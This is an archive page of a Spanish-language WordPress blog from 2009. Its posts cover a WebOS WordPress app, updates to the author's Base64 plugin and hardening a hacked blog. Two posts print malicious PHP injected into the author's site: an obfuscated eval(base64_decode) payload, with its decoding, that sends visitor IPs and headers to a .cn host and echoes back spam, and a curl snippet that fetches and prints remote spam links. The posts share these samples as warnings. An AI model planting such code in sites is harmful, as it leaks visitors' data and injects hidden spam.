Archive for the 'Wordpress' Category

WordPress llega como aplicación a la plataforma WebOS

Publicado el 08/12/09 por MrAnderson en Internet, Software, WebOS/Nova and Wordpress 0 Comments Tags: , , , . Visitas: 1452
WordPress on WebOS

WordPress on WebOS

Vía PreCentral me entero que la gente de Keen Studios está trabajando en el desarrollo de una aplicación que permitirá manejar un blog basado en WordPress directamente desde cualquier dispositivo basado en WebOS.

Dicha aplicación permitirá crear nuevos posts y editarlos, administrar los usuarios, etc. De hecho algunas funcionalidades requerirán de un plugin llamado WPre el cual permitirá hacer más cosas que las que habitualmente hace una aplicación WebOS.

Aún no está disponible como beta, pero la gente de Keen Studios está trabajando a fondo para disponer de ella lo más pronto posible.

Francamente no encuentro la hora de poder ponerle las manos encimas a un Palm Pre y sacarle todo el provecho posible.

Links:

Asegura tu instalación de WordPress

Publicado el 17/08/09 por MrAnderson en Internet and Wordpress 0 Comments Tags: , , . Visitas: 1235
Wordpress Logo

WordPress Logo

Hace algún tiempo atrás mi blog fue hackeado y en el código fuente de este aparecía una gran cantidad de información referente a drogas de abuso y otros medicamentos. Dicho texto se encontraba en el meta tag del blog dentro del header y por lo tanto no era visible directamente en el blog, pero lo ralentizaba notoriamente y hacía que el tiempo de procesador usado por mi hosting se disparara y el blog arrojara error 505.

Afortunadamente encontré información que permite asegurar la instalación de WordPress y hacer que sea mucho más difícil de hackear, no imposible por supuesto, pero al menos hacer que el trabajo de estos “chupasangre” sea más complicado.

La información necesaria para asegurar la instalación de WordPress la pueden encontrar en ANieto2k, Pro Blog Dessign y Blog Security bastante bien detallada y por lo tanto sólo comentaré los puntos en que tuve algunas dificultades.

Es importante modificar el prefijo de las tablas de WordPress, pues el no utilizar el prefijo estándar hará más dificil a los hackers ingresar a la base de datos a la fuerza. Esto se puede realizar editando el archivo wp-config.php, pero además requiere modificar la base de datos SQL de WordPress en forma manual, lo cual está explicado en el documento PDF de Blog Security. Una forma sencilla de hacerlo cuando ya tienes WordPress instalado, es usar el plugin WP Prefix Table Changer.

Otra cosa imprescindible de realizar es proteger el acceso a la carpeta wp-admin con contraseña usando htaccess. Andrés Nieto comenta acerca de la existencia de herramientas online que permiten crear los archivos htaccess y htpasswd necesarios, pero en mi caso no funcionaron y la solución final fue utilizar las herramientas que proveía mi hosting en el panel de herramientas. Aparentemente cada hosting tiene un algoritmo propio para la codificación de la información contenida en el archivo htpasswd.

Todos los tutoriales concuerdan en que la utilización de SSL (HTTPS) favorece la seguridad de WordPress, sin embargo en algunos hosting esto tiene un valor adicional, como es mi caso con DreamHost, así que obviamente como ya tengo un servidor virtual privado, deseché dicha opción.

Por supuesto también es imprescindible evitar que puedan listar el contenido de los subdirectorios, y evitar el hotlinking tanto de imágenes como de archivos que tengas alojados en el blog, pues esto evita el abuso de ancho de banda.

Afortunadamente con todo esto el blog ya no tiene código maliciosamente insertado en su fuente, los spam dejaron de ser tan continuos también gracias al plugin Bad Behavior, y el consumo de tiempo de procesador y ancho de banda se estabilizaron en valores normales. Si tienen problemas del mismo tipo les recomiendo seguir las mismas medidas, y si no tienen problemas, pues es mejor prevenirlos que lamentarlo después.

Links:

Plugin Base64 Encoder/Decoder para WordPress actualizado a la versión 0.8.5

Publicado el 02/08/09 por MrAnderson en Personal and Wordpress 0 Comments Tags: , , , , , . Visitas: 956

Wordpress Logo

Wordpress Logo

Base64 Encoder/Decoder es un plugin para WordPress que permite codificar partes de un post en base64 del lado del servidor, encerrando el texto que quieres codificar usando tags simples e intuitivos.

Estos tags <base64> y </base64>, usan el mismo formato que los tags html, de tal forma que cuando desactivas el plugin, el post se muestra sin codificacion, sin necesidad de ser modificado o re-editado.

Recientemente actualicé Base64 Encoder/Decoder a la versión 0.8.5 la cual es completamente compatible con WordPress 2.8.2. Esta actualización menor agrega archivos de internacionalización que no estaban presentes en la versión anterior, y que permiten la traducción del plugin a otros idiomas sin necesidad de editar el código fuente del plugin.

Plugin Base64

Ahora sólo resta implementar un botón de quicktag al Editor Visual, de tal forma que el tag no sea borrado automáticamente al no estar “registrado” por TinyMCE. Más adelante planeo agregar CSS al bloque de texto en base64 y que éste CSS pueda ser editado y modificado con el objeto de llenar las necesidades de diseño de los administradores de WordPress que tengan instalado el plugin, con lo cual el plugin alcanzaría la versión final.

Pueden descargarlo diréctamente de ESTE link o desde su página en la cual se comentan todas las funcionalidades de dicho plugin.

Espero que esta nueva versión sea de su agrado y les preste una gran utilidad. Saludos.

Links:

MrAnderson MD online nuevamente y más seguro

Publicado el 24/06/09 por MrAnderson en Personal and Wordpress 8 Comments Tags: , , , . Visitas: 1107
Wordpress Logo

WordPress Logo

Como ustedes habrán notado el blog estuvo caído bastantes días. Resulta que de alguna forma personas sin la suficiente moral lograron entrar en mi blog e insertaron código malicioso, el cual no sólo incluía spam en el header del blog a través de meta tags, sino que aparentemente también corría un script que transformó al blog en un bot de spam. Al menos así lo creo ya que no supe donde encontrar los php insertados, pero claramente el tiempo de procesador usado por el servidor excedía lo que me otorgaba el hosting.

Ya en una ocasión previa había eliminado dicho código, pero volvieron a insertarlo, así que tuve que cortar por lo sano… Parkear el blog y buscar información que me permitiera hacer el blog más seguro ante el ataque de exploits.

La primera ayuda la encontré en el blog Andres Nieto, un excelente diseñador y gurú de WordPress, y a través de él llegué finalmente a Pro Blog Design y Blog Security los cuáles contienen indicaciones adicionales que permiten asegurar la instalación de WordPress y evitar el ataque de hacker que pretenden insertar código malicioso en el blog.

Aún queda algo de trabajo por hacer pero es menor, como proteger los directorios wp-content y wp-includes, pero el trabajo mayor ya está listo, es decir, proteger wp-admin vía htaccess y htpasswd, evitar el hotlinking tanto de imágenes como de archivos, evitar el listado de los subdirectorios, modifiqué las passwords tanto del servidor ftp, como de mysql, y del mismo blog, e incluso modifiqué el prefijo de las tablas de WordPress para que no sea el predeterminado y así reducir más aún los riesgos de infección.

Links:

Plugin Base64 Encoder/Decoder para WordPress actualizado a la versión 0.8.2

Publicado el 15/03/09 por MrAnderson en Personal and Wordpress 0 Comments Tags: , , , , , . Visitas: 927

Wordpress Logo

Wordpress Logo

Base64 Encoder/Decoder es un plugin para WordPress que permite codificar partes de un post en base64 del lado del servidor, encerrando el texto que quieres codificar usando tags simples e intuitivos.

Estos tags <base64> y </base64>, usan el mismo formato que los tags html, de tal forma que cuando desactivas el plugin, el post se muestra sin codificacion, sin necesidad de ser modificado o re-editado.

Recientemente actualicé Base64 Encoder/Decoder a la versión 0.8.2 la cual es completamente compatible con WordPress 2.7.1. Esta actualización menor arregla un pequeño bug existente en la versión anterior, presente en la rutina que chequea la existencia de una versión más reciente. También agregué un ícono que se puede visualizar cuando expandes la lista para configurar los distintos plugins de WordPress en Settings. Además agregué un link directo a la configuración del plugin que se puede visualizar en la lista de plugins activos.

Plugin Base64

Ahora sólo resta implementar un botón de quicktag al Editor Visual, de tal forma que el tag no sea borrado automáticamente al no estar “registrado” por TinyMCE. Más adelante planeo agregar CSS al bloque de texto en base64 y que éste CSS pueda ser editado y modificado con el objeto de llenar las necesidades de diseño de los administradores de WordPress que tengan instalado el plugin, con lo cual el plugin alcanzaría la versión final.

Pueden descargarlo diréctamente de ESTE link o desde su página en la cual se comentan todas las funcionalidades de dicho plugin.

Espero que esta nueva versión sea de su agrado y les preste una gran utilidad. Saludos.

Links:

Hackean blogs basados en WordPress usando base64

Publicado el 09/03/09 por MrAnderson en Personal and Wordpress 2 Comments Tags: , , , , . Visitas: 931

Wordpress Logo

Wordpress Logo

Pensaba que la encriptación en base64 no era común, de hecho el único plugin de WordPress que lo utiliza es el creado por mi. Sin embargo, recientemente recibí un ataque que insertó código malicioso encriptado en base64 después del header aprovechando aparentemente un exploit de WordPress, a pesar que el blog está protegido por Bad Behavior.

El código introducido es el siguiente:

<?php eval(base64_decode(‘CmZ1bmN0aW9uIGc4NzQ2MjgzNDcyMzQo
JHUsICRwID0gYXJyYXkgKCkpIHsKICAgICRjID0gY3VybF9pbml0KCk7CiAg
ICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VUkwsICR1KTsKICAgIGN1cm
xfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAg
IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1RJTUVPVVQsIDMwKTsKICAgI
CRoID0gY3VybF9leGVjKCRjKTsKICAgIGN1cmxfY2xvc2UgKCRjKTsKICAgIH
JldHVybiAkaDsKfQoKaWYgKHN1YnN0cigkX1NFUlZFUlsnUkVRVUVTVF9VU
kknXSwgMCwgOSkgPT0gJy9wYWdlLnBocCcpIHsKICAgIG9iX2VuZF9jbGV
hbigpOwoKICAgIGVjaG8gZzg3NDYyODM0NzIzNCgiaHR0cDovL3d3dy5teX
dlYi1zdGF0aXN0aWNzLmNuL2dldC5waHA/aT0iIC4gdXJsZW5jb2RlKCRfU0
VSVkVSWydSRU1PVEVfQUREUiddKSAuICImaD0iIC4gcmF3dXJsZGVjb2Rl
KCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJmE9MSZpZD0iIC4gdXJsZW
5jb2RlKHN1YnN0cigkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgMTMpKSAu
ICImbT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiA
iJmw9IgogICAgICAgIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0FDQ0
VQVF9MQU5HVUFHRSddKSAuICImdT0iIC4gdXJsZW5jb2RlKCRfU0VSVkV
SWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiJnI9IiAuIHVybGVuY29kZSgkX1N
FUlZFUlsnSFRUUF9SRUZFUkVSJ10pKTsKCiAgICBleGl0Owp9IGVsc2Ugewo
gICAgZWNobyBnODc0NjI4MzQ3MjM0KCJodHRwOi8vd3d3Lm15d2ViLXN0
YXRpc3RpY3MuY24vZ2V0LnBocD9pPSIgLiB1cmxlbmNvZGUoJF9TRVJWR
VJbJ1JFTU9URV9BRERSJ10pIC4gIiZsPSIgLiB1cmxlbmNvZGUoJF9TRVJWR
VJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIC4gIiZoPSIgLiByYXd1cmxkZ
WNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSAuICImbT0iIC4gdXJsZW5
jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJnU9IgogICAgICAgIC4g
dXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiJnI9I
iAuIHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKTsKfQ==’)); ?>

El cual se traduce en esto:

function g874628347234($u, $p = array ()) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $u);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 30);
$h = curl_exec($c);
curl_close ($c);
return $h;
}

if (substr($_SERVER['REQUEST_URI'], 0, 9) == ‘/page.php’) {
ob_end_clean();

echo g874628347234(“http://www.myweb-statistics.cn/get.php?i=” . urlencode($_SERVER['REMOTE_ADDR']) . “&h=” . rawurldecode($_SERVER['HTTP_HOST']) . “&a=1&id=” . urlencode(substr($_SERVER['REQUEST_URI'], 13)) . “&m=” . urlencode($_SERVER['HTTP_HOST']) . “&l=”
. urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']) . “&u=” . urlencode($_SERVER['HTTP_USER_AGENT']) . “&r=” . urlencode($_SERVER['HTTP_REFERER']));

exit;
} else {
echo g874628347234(“http://www.myweb-statistics.cn/get.php?i=” . urlencode($_SERVER['REMOTE_ADDR']) . “&l=” . urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']) . “&h=” . rawurldecode($_SERVER['HTTP_HOST']) . “&m=” . urlencode($_SERVER['HTTP_HOST']) . “&u=”
. urlencode($_SERVER['HTTP_USER_AGENT']) . “&r=” . urlencode($_SERVER['HTTP_REFERER']));
}

Finalmente el código inserta un div con texto oculto relacionado con drogas de abuso, medicamentos de prescripción médica de venta ilegal, etc. Así que es recomendable cada cierto tiempo echar una mirada al código fuente del blog y buscar si se ha producido la inserción de código malicioso. Saludos.

Links:

Plugin Base64 Encoder/Decoder para WordPress actualizado a la versión 0.8

Publicado el 03/03/09 por MrAnderson en Personal and Wordpress 0 Comments Tags: , , , , , . Visitas: 898

Wordpress Logo

Wordpress Logo

Base64 Encoder/Decoder es un plugin para WordPress que permite codificar partes de un post en base64 del lado del servidor, encerrando el texto que quieres codificar usando tags simples e intuitivos.

Estos tags <base64> y </base64>, usan el mismo formato que los tags html, de tal forma que cuando desactivas el plugin, el post se muestra sin codificacion, sin necesidad de ser modificado o re-editado.

Recientemente actualicé Base64 Encoder/Decoder a la versión 0.8 la cual es completamente compatible con WordPress 2.7.1. Esta actualización optimiza la decodificación del texto encriptado usando AJAX, de tal forma que ahora el texto es invisible para las máquinas de búsqueda a diferencia de la versión anterior, en la cual el texto decodificado estába oculto en el post.

Plugin Base64

Ahora sólo resta implementar un botón de quicktag al Editor Visual, de tal forma que el tag no sea borrado automáticamente al no estar “registrado” por TinyMCE, con lo cual el plugin alcanzaría la versión final. Eventualmente más adelante podría agregar CSS al bloque de texto en base64 y que éste CSS pueda ser editado y modificado con el objeto de llenar las necesidades de diseño de los administradores de WordPress que tengan instalado el plugin.

Pueden descargarlo diréctamente de ESTE link o desde su página en la cual se comentan todas las funcionalidades de dicho plugin.

Espero que esta nueva versión sea de su agrado y les preste una gran utilidad. Saludos.

Links:

Plugin Base64 Encoder/Decoder para WordPress actualizado a la versión 0.7.1

Publicado el 28/02/09 por MrAnderson en Personal and Wordpress 0 Comments Tags: , , , , , . Visitas: 1189

Wordpress Logo

Wordpress Logo

Base64 Encoder/Decoder es un plugin para WordPress que permite codificar partes de un post en base64 del lado del servidor, encerrando el texto que quieres codificar usando tags simples e intuitivos.

Estos tags <base64> y </base64>, usan el mismo formato que los tags html, de tal forma que cuando desactivas el plugin, el post se muestra sin codificacion, sin necesidad de ser modificado o re-editado.

Recientemente actualicé Base64 Encoder/Decoder a la versión 0.7.1 la cual es completamente compatible con WordPress 2.7.1. Esta actualización menor soluciona un pequeño bug que se producía cuando se muestran varios posts que incluyen código encriptado con base64. El error se producía al decodificar el texto encriptado, mezclándose el texto decodificado entre uno y otro post debido a una falta de identificación adecuada del texto encriptado con el post correcto.

Plugin Base64

Ahora la decodificación funciona adecuadamente con el post correcto a pesar que se muestren múltiples posts con contenido codificado en base64. Ya estoy desarrollando la versión 0.8 en la cuál agregaré decodificación usando AJAX, pues actualmente el texto decodificado está oculto en el post, siendo visible por las máquinas de búsqueda lo cual por supuesto no es óptimo.

Pueden descargarlo diréctamente de ESTE link o desde su página en la cual se comentan todas las funcionalidades de dicho plugin.

Espero que esta nueva versión sea de su agrado y les preste una gran utilidad. Saludos.

Links:

Plugin Base64 Encoder/Decoder para WordPress actualizado a la versión 0.7

Publicado el 25/02/09 por MrAnderson en Personal and Wordpress 0 Comments Tags: , , , , , , . Visitas: 1517

Wordpress Logo

Wordpress Logo

Base64 Encoder/Decoder es un plugin para WordPress que permite codificar partes de un post en base64 del lado del servidor, encerrando el texto que quieres codificar usando tags simples e intuitivos.

Estos tags <base64> y </base64>, usan el mismo formato que los tags html, de tal forma que cuando desactivas el plugin, el post se muestra sin codificacion, sin necesidad de ser modificado o re-editado.

Recientemente actualicé Base64 Encoder/Decoder a la versión 0.7 la cual es completamente compatible con WordPress 2.7.1. Esta versión soluciona el problema con las comillas dobles que se presentaba en la versión previa, pues el código del plugin las reemplaza internamente por comillas simples las cuales no producen conflictos con la encriptación.

Plugin Base64

También agregué una funcionalidad que detecta la presencia de los antiguos tags y que permite que estos sean reemplazados por los nuevos en toda la base de datos de WordPress. Y finalmente limpié un poco el código fuente eliminando funciones redundantes y optimizando otras funciones para que fueran más eficientes con menos código.

Además ahora el plugin está disponible para ser descargado desde el repositorio de Plugins de WordPress de tal forma que las próximas versiones pueden ser actualizadas automáticamente desde el Dashboard de WordPress.

La inclusión del plugin en este repositorio requirió cambiar el directorio en el cual éste se instala debido a la forma en que funciona la subversión en WordPress, por lo tanto es necesario que desinstalen cualquier versión previa e instalen la última versión, pero es un cambio menor que permitirá una actualización más sencilla.

Pueden descargarlo diréctamente de ESTE link o desde su página en la cual se comentan todas las funcionalidades de dicho plugin.

Está pendiente aún la creación de un botón quicktag para el Rich Text Editor y optimizar el reemplazo inline del texto codificado usando AJAX para que el procedimiento sea completamente invisible a las máquinas de búsqueda, con lo cual el desarrollo del plugin llegaría a su fin.

Espero que esta nueva versión sea de su agrado y les preste una gran utilidad. Saludos.

Links:

Hackeo por parte de FunaChile

Publicado el 06/02/09 por MrAnderson en Internet, Personal and Wordpress 4 Comments Tags: , , . Visitas: 908
FunaChile

FunaChile

Simplemente hay gente que no sabe respetar los derechos de los demás, y que gusta de abusar del ancho de banda que uno paga de su propio bolsillo, de tal forma de aparecer en las máquinas de búsqueda mejor posicionados y de esta forma poder vender avisaje y hacer profitar sus propios bolsillos.

Repentinamente me di cuenta que mi blog no rendereaba bien, se veía horrible. Restauré una versión previa del blog, verifiqué la base de datos SQL, desactivé y activé algunos plugins, hasta que revisando el código fuente de la página me encuentro con este script…

<?php
if (extension_loaded(“curl”)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, “http://oupremed.com/s/14.txt”);
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode(“”,file(“http://oupremed.com/s/14.txt”)); }
if($r) print $r;
?>

El script hacía referencia a una página llamada FunaChile insertando metatags en los primeros bloques del header de mi blog. Les dejo una muestra de algunos de los casi 50 links que insertó el script…

<a href=”http://www.funachile.cl/administrator_remove/index.php”>100mg viagra</a><br>
<a href=”http://www.funachile.cl/administrator_remove/?bjaka=1″>20mg cialis</a><br>
<a href=”http://www.funachile.cl/administrator_remove/?bjaka=2″>apotheke cialis</a><br>

Esta situación molesta que debe ser denunciada para que no ocurra con otros blogs, y espero poder dar una voz de advertencia desde esta humilde blog. Simplemente la gente de FunaChile se merece una FUNA

Links:

Licencia de Creative Commons

RSS

  • Subscribe with iTunes
  • Subscribe to the RSS Feed
  • Subscribe to the comments RSS Feed

Google AdSense

Mi Twitter

Posting tweet...

Powered by Twitter Tools

Mis Apps

Software tracking